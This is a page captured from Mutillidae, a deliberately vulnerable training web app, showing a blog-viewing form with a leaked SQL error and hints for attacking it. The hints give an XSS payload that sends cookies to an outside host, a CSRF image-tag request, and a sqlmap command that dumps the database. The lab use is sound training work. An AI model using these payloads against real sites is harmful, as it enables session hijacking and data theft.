View Blogs

  Back

View Blog Entries

Add To Your Blog

Validation Error: Please choose blog entries to view

Select Author and Click to View Blog

Please Choose Author      Show All   Error: Failure is always an option and this situation proves it Line 91 Code 0 File /var/www/mutillidae/view-someones-blog.php Message Error executing query: Table 'metasploit.accounts' doesn't exist Trace #0 /var/www/mutillidae/index.php(469): include() #1 {main} Diagnotic Information SELECT * FROM accounts Did you setup/reset the DB?

Hints

For XSS:XSS is easy stuff. This one shows off both reflected (you see the results instantly) and stored (someone can run across it later in another app that uses the same database). "<script>alert("XSS");</script>" is the classic, but there are far more interesting things you could do which I plan show in a video later. For some hot cookie stealing action, try something like: <script> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie); </script> Check out Rsnake's XSS Cheet Sheet for more ways you can encode XSS attacks that may allow you to get around some filters. For CSRF:You can create another page someplace and make a link to an image that is not an image. You can also send someone an HTML email with a link inside. Sending links over HTML aware Instant Messaging like Communicator also works. One of the quietest methods is to use HTML injection to poison a web page thus creating a persistant attack. When a user visits the poisoned page, their browser will reach out to the targe page. Using an AJAX request can keep the rouge tranaction silent. You could use something like the following: <img src="http://localhost/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy"> This is the easy way to do CSRF with the GET method. Login as someone, make your page with the link image someplace else, and then view it. You should now see something new on the comment wall. For Cross Site Request Forgery, a tool like the Social Engineering Toolkit by Dave Kennedy can help.

To use sqlmap, you need to know the page URL. We can get that by viewing requests and responses with HTTPFox, Paros, Burp, etc. We decide whether to attack via GET or POST. sqlmap will automatically test URL query parameters supplied in the URL that you give. To tell sqlmap about POST parameters, use the "--data" switch. Discover all the POST parameters using a tool like Burp to make this part easy. Use the sqlmap help. Type python sqlmap.py -h. When your ready, string all this information together: python sqlmap.py --url="http://192.168.56.101/mutillidae/index.php?page=view-someones-blog.php" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump